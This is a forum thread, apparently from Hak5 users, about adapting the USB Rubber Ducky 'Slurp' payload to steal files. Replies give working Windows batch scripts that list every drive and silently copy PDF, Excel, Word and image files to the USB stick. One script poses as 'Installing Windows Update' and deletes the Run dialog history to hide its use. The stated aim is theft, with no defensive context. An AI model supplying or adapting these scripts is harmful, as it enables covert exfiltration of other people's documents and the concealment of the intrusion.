(Slurp) Stealing all files with specified extensions, regardless of hard-drive?

[NotANinja]

In Hak5's blog post about stealing files with the USB Rubber Ducky, they only targeted the documents folder on the C: drive. I'm looking to steal all .PDFs/Excel spreadsheet, regardless of their directory/drive. Can anyone show me how this is done? I have been trying all day now, but can't get a satisfactory result. 

Thanks in advance! Any help would be greatly appreciated.

[NotANinja]

Are you sure you didn't reply to the wrong thread, kdodge?

[Cribbit]

There are probably a few ways to do this.
Code below is untested on a ducky

REM Get all drive letters, skips name lable
FOR /F "skip=1" %%A IN ('wmic logicaldisk get name') DO (
REM Check drive is not the ducky  
IF %%~dA NEQ %~d0 (
REM COPY FILE
xcopy /C /Q /G /Y /S %%A\*.pdf %dst% >>nul
)
)

or

REM Get all drive letters, skips name lable
FOR /F "skip=1" %%A IN ('wmic logicaldisk get name') DO (
REM Check drive is not the ducky  
IF %%~dA NEQ %~d0 (
REM Call dir on each drive letter find files ending in .pdf or .xlsx
FOR /F "delims==" %%I IN ('dir %%A\ /s /b /a-d ^| findstr /ile ".pdf .xlsx"') DO (
REM COPY FILE
xcopy /C /Q /G /Y %%I %dst% >>nul
)
)
)

Hope this helps

[voidnecron_]

Cribbit has a good point, but this will take forever though.
If you have limited time to extract you could consider using %homepath% to see where Windows stores files by default. In most company GPO's this will be directed to some network drive.
%temp% could have interesting stuff as well.

Cheers.

[felipe]

Need help here.. It will steal all pdf, doc, docx, jpeg, jpg from %USERPROFILE ?

e.cmd

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

REM Same as above but does not create empty directories
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.doc %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.docx %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.jpg %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.jpeg %dst% >>nul
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit

[felipe]

works on win7 ??